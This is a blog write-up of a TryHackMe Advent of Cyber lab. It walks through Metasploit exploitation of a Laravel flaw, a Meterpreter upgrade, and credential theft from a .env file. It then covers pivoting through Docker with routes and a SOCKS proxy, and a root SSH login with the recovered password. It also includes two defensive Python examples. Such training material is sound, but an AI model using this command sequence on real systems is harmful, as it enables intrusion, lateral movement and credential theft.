Advent Of Cyber 2022 | Day 9 | TryHackMe


Welcome to yet another blog, guys. I hope you are all doing well. Are you enjoying this season of Advent of Cyber? I think this season is pretty good. So, without any further ado, let's move on to today's task.

Dock the halls

Note: Please don't use the normal AttackBox in this task. Use the Kali Linux VM instead.

an image illustrating the location of the Kali VM launch button

an image illustrating the Kali VM and AttackBox launch buttons

an image illustrating the Kali VM in split screen view

This room mainly focuses on Metasploit and Meterpreter.

Before that, let's first understand Docker. Docker is a way to package an application and its dependencies into a single unit called an image. This image can then be shared and run as a container, either locally on a developer machine or remotely on a production server. Now, let's understand Metasploit. The Metasploit Framework is a powerful tool that provides a universal interface for working with vulnerability exploit code. It has exploit modules for a wide range of vulnerabilities affecting web servers, operating systems, network equipment and everything in between.

Meterpreter is an advanced payload that provides interactive access to a compromised system. Meterpreter supports running commands on a remote target, including uploading/downloading files and pivoting.

Another term just came up: what is pivoting? Suppose you have gained access to one machine. You can then reach further machines through that already-compromised machine. Pivoting is the act of an attacker moving from one compromised system to one or more other systems within the same or another organisation.

I would recommend completing the Metasploit room as well, since it is a very deep topic and I will not be able to cover all of Metasploit in this write-up. Let's move on to the task.

Question1

For this, we will use nmap. The syntax is:

nmap -sC -sV -F <ip address>

Question2

Let's first start our Metasploit. For this, the command is msfconsole

Paste the IP address into Firefox. Open the developer tools (Inspect Element) and click on the Network tab. Scroll down a bit and you can see the Laravel framework being used.

Question3

Go to your Metasploit and search laravel.

Select the second module with the use command.

Now run the info command to get the CVE.

Now let's check if the system is vulnerable or not.

Run set RHOST <ip address> and then run check.

Now run ip a to confirm your interface name, and then set LHOST eth0.

Use command exploit.

Then run the id command.

Let's upgrade this shell to meterpreter.

For this, run background and confirm with yes when asked.

Check the sessions first by sessions command.

Question4

For this, the syntax is: sessions -u -1 (where -1 refers to the most recent session)

Check the sessions again with the sessions command. You can see we have two sessions now.

To interact with the Meterpreter session, use sessions -i 2

You can use the help command to get information about the basic Meterpreter commands.

Question5

For this, use the command ls /

You can see the .dockerenv file in this listing.

Let's drop into a system shell with the shell command.

Run id, then env, and change directory to /var/www. Now use ls -la to list the files, including hidden ones.

Let's look at the contents of .env.

Question6

As you can see, all the passwords are in the .env file, so the answer is .env.
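The lesson of this question is that a readable .env file in a web root hands over every credential the application uses. As an added example (my own code, not part of the room or the Laravel project), here is a small audit script a defender could run against a web root such as /var/www: it finds .env files, parses them, reports only the credential-like keys with their values redacted, and notes whether the file is world-readable. The sample .env content and the pattern of key names it treats as secrets are constructed assumptions.

```python
"""Audit Laravel-style .env files for credential-like keys (added example)."""
import os
import re
import stat
import tempfile
from dataclasses import dataclass

# Key names that usually carry credentials (assumed list; extend for your stack).
SECRET_KEY_PATTERN = re.compile(r"PASSWORD|PASS\b|SECRET|TOKEN|API_KEY|APP_KEY|PRIVATE", re.I)


@dataclass
class Finding:
    path: str
    key: str
    preview: str          # redacted, so the audit report itself leaks nothing
    world_readable: bool  # file mode lets "other" read it


def parse_env(text: str) -> dict:
    """Parse KEY=VALUE lines; skips comments/blank lines and strips matching quotes."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def redact(value: str) -> str:
    """Report only the length; never echo the secret into logs or tickets."""
    return f"<redacted, {len(value)} chars>"


def audit_env_text(text: str, path: str = "<memory>", world_readable: bool = False) -> list:
    """Return one Finding per non-empty credential-like key in the .env text."""
    return [
        Finding(path, key, redact(value), world_readable)
        for key, value in parse_env(text).items()
        if SECRET_KEY_PATTERN.search(key) and value
    ]


def audit_tree(root: str) -> list:
    """Walk a web root such as /var/www and audit every .env / .env.* file found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == ".env" or name.startswith(".env."):
                path = os.path.join(dirpath, name)
                mode = os.stat(path).st_mode
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(audit_env_text(fh.read(), path, bool(mode & stat.S_IROTH)))
    return findings


# Constructed sample .env in Laravel's layout; the values are placeholders, not the room's.
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:EXAMPLEKEYNOTREAL
APP_DEBUG=true
# database block
DB_CONNECTION=pgsql
DB_HOST=webservice_database
DB_PORT=5432
DB_DATABASE=postgres
DB_USERNAME=postgres
DB_PASSWORD="ExamplePass123"
"""


def demo_tree() -> list:
    """Write the sample .env into a throwaway web root, audit it, and clean up."""
    with tempfile.TemporaryDirectory() as root:
        app_dir = os.path.join(root, "html")
        os.makedirs(app_dir)
        env_path = os.path.join(app_dir, ".env")
        with open(env_path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_ENV)
        os.chmod(env_path, 0o644)  # the typical careless mode: world-readable
        return audit_tree(root)


if __name__ == "__main__":
    for f in demo_tree():
        print(f"{f.path}: {f.key} = {f.preview} (world-readable: {f.world_readable})")
```

Run it with python3 audit_env.py to see the constructed sample flagged; point audit_tree at a real web root to use it for a check. The report deliberately prints lengths rather than values, so it can be pasted into a ticket without becoming a second copy of the secrets.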

Question7

Use the exit command to leave the shell. But before that, note that we need to find the table in the database, and the only database named in the .env file is

Let's resolve this database hostname. Run the resolve webservice_database command in Meterpreter.

This is an internal IP address, so we cannot reach it directly from our machine. Let's use msfconsole to pivot to this address. Remember, I told you that we can compromise more systems through an already-compromised system; that is exactly what we are doing here.

Let's get back to msfconsole. Use the background command to do so.

Use the command route add <database ip address>/32 2 (the address is the one we found when we resolved the database hostname, /32 is the netmask covering that single host, and 2 is the session number).

We can also tell from the presence of the /.dockerenv file that we are inside a Docker container. By default, Docker uses a hard-coded IP address to represent the host machine (172.17.0.1 on the default bridge network). We will add that to our routing table as well, for scanning later.

Use route print to check the address we just added.

Now, let's access the database. Remember the username and password from .env; they were for postgres. Let's search for this in Metasploit.

The one we are going to use is :

As you can see, it is number 16 in the search results, so run use 16 to select it.

You can see that the prompt changes now. Let's set our RHOST again.

set RHOST <database ip>

Use command exploit.

Got the table name.

Question8

For the password, let's search for postgres again.

We are going to use this module:

use 11

This module will help us to execute simple SQL Queries.

Set the RHOST again, just like we set it above. If you run info, you can see that the default DATABASE option is not the one we want.

Use command set DATABASE postgres

Let's use some SQL knowledge here. Run set SQL "Select * from users" (this will show us every row and column in the users table) and then use the run command.

We got the password.

Question9

To further pivot through the private network, we can create a socks proxy within Metasploit:

search socks

We will use module 0: use 0

Then use run to start this module. Now, in another terminal as the root user, we can use curl with the internal Docker IP to show that the web application is running and that the SOCKS proxy works.

Use the command: curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1 -v

This means we can reach the web server on the Docker host through the proxy.

Now let's use proxychains. Open the /etc/proxychains4.conf file and scroll to the end.

Change this to :

ProxyChains is a tool that redirects the TCP connections made by applications through various proxies, such as SOCKS4, SOCKS5 or HTTP. In our case, it takes curl's traffic and routes it through the Metasploit SOCKS proxy. Use the command proxychains curl http://172.17.0.1

We will get to see some source code just like before.

Let's use nmap now: proxychains nmap -F -sT -Pn 172.17.0.1 (-sT is required because a SOCKS proxy can only carry full TCP connections, not raw SYN packets, and -Pn skips host discovery, which would not work through the proxy either).

Got the result? It shows SSH and HTTP (ports 22 and 80).
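Because a connect scan through a SOCKS pivot completes real TCP handshakes, the Docker host sees it as a burst of ordinary connections from the container's IP, one per port. As an added example (my own code, not from the room), here is a small detector that runs over connection-log lines and flags any source that touched many distinct TCP ports on one host within a short window, while leaving repeated hits on a single port (normal web traffic) alone. The log line format, the sample addresses and the 25-port list standing in for nmap's -F list are all constructed assumptions.

```python
"""Flag TCP connect-scan bursts in connection-log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed log format (assumption): "<ISO-8601 ts> src=<ip> dst=<ip> dport=<n> proto=<tcp|udp>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)\s+proto=(?P<proto>\w+)$"
)


def parse_line(line: str):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dport"]),
        "proto": m["proto"].lower(),
    }


def detect_port_scans(lines, min_ports=20, window=timedelta(seconds=60)):
    """Return (src, dst, distinct_ports) for every src that touched at least
    `min_ports` distinct TCP ports on one dst inside any `window`-long span."""
    events = defaultdict(list)  # (src, dst) -> [(ts, dport), ...]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == "tcp":
            events[(rec["src"], rec["dst"])].append((rec["ts"], rec["dport"]))

    alerts = []
    for (src, dst), hits in events.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):  # sliding window over the time-sorted hits
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, len({p for _, p in hits[start:end + 1]}))
        if best >= min_ports:
            alerts.append((src, dst, best))
    return alerts


# 25 constructed ports standing in for nmap's -F "top ports" list.
SCANNED_PORTS = [21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
                 993, 995, 1723, 3306, 3389, 5432, 5900, 8080, 8443, 8888, 9090, 10000]


def _fmt(ts: datetime, src: str, dst: str, dport: int) -> str:
    return f"{ts.isoformat().replace('+00:00', 'Z')} src={src} dst={dst} dport={dport} proto=tcp"


def build_sample_log():
    """Constructed sample: a burst from a container (172.17.0.2) against the Docker
    host (172.17.0.1), repeated normal web traffic from a second container, and a
    slow three-port touch from a third that stays under the threshold."""
    base = datetime(2022, 12, 9, 10, 0, 0, tzinfo=timezone.utc)
    lines = [_fmt(base + timedelta(milliseconds=100 * i), "172.17.0.2", "172.17.0.1", p)
             for i, p in enumerate(SCANNED_PORTS)]
    lines += [_fmt(base + timedelta(seconds=i), "172.17.0.3", "172.17.0.1", 80) for i in range(30)]
    lines += [_fmt(base + timedelta(minutes=5 * i), "172.17.0.4", "172.17.0.1", p)
              for i, p in enumerate([22, 80, 443])]
    lines.append("garbage line that should be ignored")
    return lines


if __name__ == "__main__":
    for src, dst, n in detect_port_scans(build_sample_log()):
        print(f"ALERT possible connect scan: {src} -> {dst}, {n} distinct ports within 60s")
```

The threshold and window are tunable; for a host that legitimately talks to many ports on one peer (a monitoring box, for instance) you would raise min_ports or whitelist the pair rather than lower the bar for everyone.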

Question10

Let's dig into SSH. Back to Metasploit: search ssh_login. We will use module 0 here.

Now let's set the username and password we got in Question 8.

set USERNAME santa then set PASSWORD p4$$w0rd

set RHOST 172.17.0.1

run

Check sessions. You can see a 4th session of type shell linux.

sessions -i 4

Then run the id command. Okay, we are root.

cd /root

You can see root.txt. Run cat root.txt to read the flag.

We made it. We finally made it. It was not an easy task. But you have done it.

Question 11

They recommend completing the Compromising Active Directory module.

Congratulations!! We completed this task. A new task will be added tomorrow. Until then, you can follow me here for upcoming blogs on Advent of Cyber 2022. At the end, you will get a certificate from TryHackMe for completing this challenge.

Keep learning and keep spreading Knowledge.


Support Tanya Goyal by becoming a sponsor. Any amount is appreciated!